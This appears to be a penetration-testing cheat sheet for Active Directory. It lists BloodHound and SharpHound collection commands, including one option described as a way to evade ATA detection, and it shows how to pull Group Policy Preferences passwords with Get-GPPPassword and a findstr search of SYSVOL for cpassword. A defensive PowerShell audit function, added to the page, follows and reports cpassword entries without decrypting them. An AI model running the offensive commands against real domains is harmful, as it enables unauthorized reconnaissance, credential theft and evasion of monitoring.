BloodHound Enumeration
BloodHound
Enable Sharp-Hound

Supply data to BloodHound
The generated archive can be uploaded to the BloodHound application.
Remote BloodHound
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All
On-Site BloodHound
#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
.\SharpHound.exe All
#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -LdapUsername <UserName> -LdapPassword <Password> -OutputDirectory <PathToFile>
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn
To avoid detections like ATA
Invoke-BloodHound -CollectionMethod All -ExcludeDC
Neo4j
Start neo4j and the BloodHound UI on the Kali machine and load the zip/json files
sudo neo4j start
If you find a Windows Server older than 2016, such as 2012 R2 or earlier, you can use these commands to show local users.
This option (Local user) is unavailable on Windows Server 2016.
#To show password, from PowerSploit
Get-GPPPassword -Server PDC.wargrey.mon
#Also to show password from SYSVOL on Windows Server 2012
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml
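A defensive counterpart to the findstr search above, as an added example that is not from the original page: a PowerShell function that reports which Group Policy Preferences XML files still carry a cpassword attribute, without decrypting or printing the value, so the entries can be removed. The function name Find-GppCpassword, the demo folder and the sample XML are constructed for illustration.

```powershell
# Added example: audit Group Policy Preferences XML for stored cpassword values.
# Reports where they are; never decrypts or prints the value itself.
function Find-GppCpassword {
    param([Parameter(Mandatory)][string]$Path)    # e.g. the domain's SYSVOL Policies folder
    Get-ChildItem -Path $Path -Recurse -Filter *.xml -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            try { $xml = [xml](Get-Content -LiteralPath $file -Raw) } catch { return }  # skip unparsable files
            # Any element carrying a non-empty cpassword attribute
            foreach ($node in $xml.SelectNodes('//*[@cpassword and string-length(@cpassword) > 0]')) {
                $item = $node.ParentNode -as [System.Xml.XmlElement]   # <User>, <Task>, <Drive>, ...
                # Account attribute differs per preference type (Groups/Drives, ScheduledTasks, Services)
                $account = 'userName', 'runAs', 'accountName' |
                    ForEach-Object { $node.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1
                [pscustomobject]@{
                    File    = $file
                    Item    = if ($null -ne $item) { $item.GetAttribute('name') }
                    Account = $account
                    Changed = if ($null -ne $item) { $item.GetAttribute('changed') }
                }
            }
        }
}

# Constructed sample standing in for a Policies folder (placeholder value, not a real cpassword)
$demo  = Join-Path ([IO.Path]::GetTempPath()) ("gpp-demo-" + [guid]::NewGuid())
$prefs = Join-Path $demo 'POLICY-GUID-PLACEHOLDER\Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $prefs -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin (constructed)" changed="2013-01-01 00:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-PLACEHOLDER" />
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $prefs 'Groups.xml') -Encoding UTF8

Find-GppCpassword -Path $demo | Format-List
Remove-Item -LiteralPath $demo -Recurse -Force
```

To audit a real domain, point -Path at the same Policies share the findstr command searches. The MS14-025 update blocks creating new cpassword entries but does not remove existing ones, so every file reported here needs to be cleaned up and the affected account's password changed.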